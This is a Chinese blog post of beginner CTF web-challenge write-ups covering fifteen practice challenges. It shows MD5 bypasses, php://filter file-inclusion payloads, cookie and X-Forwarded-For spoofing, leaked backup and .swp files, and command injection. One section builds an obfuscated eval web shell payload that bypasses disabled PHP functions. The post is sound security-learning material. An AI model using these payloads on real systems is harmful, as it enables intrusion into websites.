web 做题随身记

题分布的比较乱,请各位别介意

第一次做文章,有哪些不足的地方请指出来,让我改进一下,谢谢大家了!!

前三个为bugkuCTF的题

1,前女友

打开题目链接

首先,查看源代码看看是否藏着flag

发现了code.txt,打开看看里面有啥东西

打开发现是一对代码,尝试进行解析

解析可得出:v1不能等于v2,但是md5要相等,并且v3要等于flag,满足这几个条件就可以获取flag,于是进行尝试

payload:?v1[]=1&v2[]=2&v3[]=3

得到了flag!

2,文件包含

打开网站,出现click me?,点击试一试

打开后发现了index.php,上面URL出现了?file=show.php

试试?file=index.php,不过好像不太行

文件包含可以是用php伪协议进行,于是尝试利用php伪协议看看能否打开网页

伪造payload:/?file=php://filter/read=convert.base64-encode/resource=show.php

得到了base64加密的东西,进行base64解码,得到其为index.php

将payload修改为:/?file=php://filter/read=convert.base64-encode/resource=index.php

得到了一长串的base64加密的代码,进行解码得到了藏在注释里的flag

3,MD5

打开网页后发现要求我们输入a

F12查看源代码,结果什么也没有,查看他人的wp得到了相关的源码

对代码进行解析,得到是用一个加密之后是 0e 开头的数字,并且两个md5值必须相等就可以绕过限制了

payload:/?a=s878926199a

对于此题搜集了一些关于MD5碰撞字符的一些内容

下面四个为buuctf的题

4,Futurella

打开题目链接,看见一张图片

F12查看源代码,发现flag藏在源代码里

5,Kookie

打开题目链接,提示我们用admin这个用户名登陆,然而用admin登陆是显示账号或密码错误,尝试使用cookie这个用户名登陆,

用bp抓包将cookie修改为admin

将cookie值修改为admin后,出现了flag

6,PYWebsite

开启题目后,得到了一个这样的网页

F12查看源代码后,在js里发现了/flag.php,尝试打开

由上述内容得,要求我们伪造XFF的IP地址,才可以看到flag

添加XFF后得到了flag

7,RCE ME

开启题目后,发现了php代码,进行代码审计

审计后,发现要求我们传的payload中不能含有大小写字母和数字,因此可以使用异或绕过或者是url编码取反绕过,进行下一步操作

先查看phpinfo内有哪些禁用函数,对phpinfo进行url编码取反得到:?code=(~%8F%97%8F%96%91%99%90)();

发现disable_functions函数内有许多禁用的函数

查看wp,得到一个shell

shell:

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo $d;
 ?>
%9E%8C%8C%9A%8D%8B<br>%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6

将其输入到url后,得到了url编码取反的一串代码:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9D%86%8F%9E%8C%8C%A2%D6%D6);

因此payload为:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9D%86%8F%9E%8C%8C%A2%D6%D6);

用蚁剑连接查看

直接打开/flag,后没有发现任何东西,想到之前phpinfo内禁用的一堆函数,也是理所应当了

利用一个插件,可以得到flag

插件:

加载插件:

选择模式:

在命令行内输入/readflag,得到flag

这个是nssctf题

8,寻找蛛丝马迹

打开题目链接,F12查看源代码,在head里发现了第一段flag

在styles.css里发现了第二段flag

在script.js里发现了第三段flag

提示不想让谷歌搜到他的网站,尝试robots.txt

得到了一串乱码,利用火狐的修复文字编码,对上述文本修复,得到了第四段flag

和苹果有关系联想到.DS_store,得到第五段flag

由提示得是一个备份文件,想到www.zip,得到最后一段flag

综上所述,flag为:FSCTF{Tell_y0U_noT_To_poInT_oUt_tH@t_y000u_Don't_believe_it!}

下面六道为catf1ag网站的题

9,GET&POST

开启题目后,得到这样一个页面

提示用GET方式传入flag=cat

payload:?flag=cat

提示用POST方式传入flag=flag,利用bp抓包尝试

注意传入的是flag=f1ag,而不是flag!!!

10,robot

开启题目后,提示notflag,由此可得payload可为:/robots.txt

跳转后得到了一个两个文件

下载第一个文件,打开即可得到flag

11, intval

开启题目,点击题目链接,得到一个php文本

进行代码审计,要求我们传入num值,

尝试payload:/?num=123

说明payload错误了,尝试加入一个字母

payload:/?num=123a

得到了flag

12,rce_me_1

打开链接要求我们对cmd传入一个值

简单的rce题,进行基础的查目录payload:/?cmd=ls

得到了get_flag_in_there_!!!!!!!!!!!!!!!!!!!这个文件,利用cat命令打开

得到了flag

13,easy_include_1

点击链接

得到了index.php,直接打开后页面出现了满屏的/?file=index.php,奇奇怪怪的

F12查看源代码后发现了flag在/get_flag里

利用php伪协议打开此文件,

伪造payload为:?file=php://filter/read=convert.base64-encode/resource=/get_flag

得到了一串base64编码的字符,将其进行解码,这里推荐使用CyberChef

14,easy_include_2

打开题目链接后,被狠狠的 抽象到了,F12查看源代码,看看flag是否藏在里面

在源代码里找到了一个flag,可惜的是这个flag是假的

继续向下找flag,在最后找到了file=,猜想使用php伪协议

伪造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

进行尝试

提示不用加php后缀所以payload:?file=php://filter/read=convert.base64-encode/resource=flag

得到了一串base64加密的字符,进行解码

得到了flag

注意要将catf1ag改为flag,才是正确答案!!

15,swp

由题目可知此题跟swp有关

在linux里vi/vim异常关闭会保留一个.swp文件,访问.index.php.swp,可以得到flag

由文字提示,正好满足条件,访问.index.php.swp

得到flag

  • 40
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值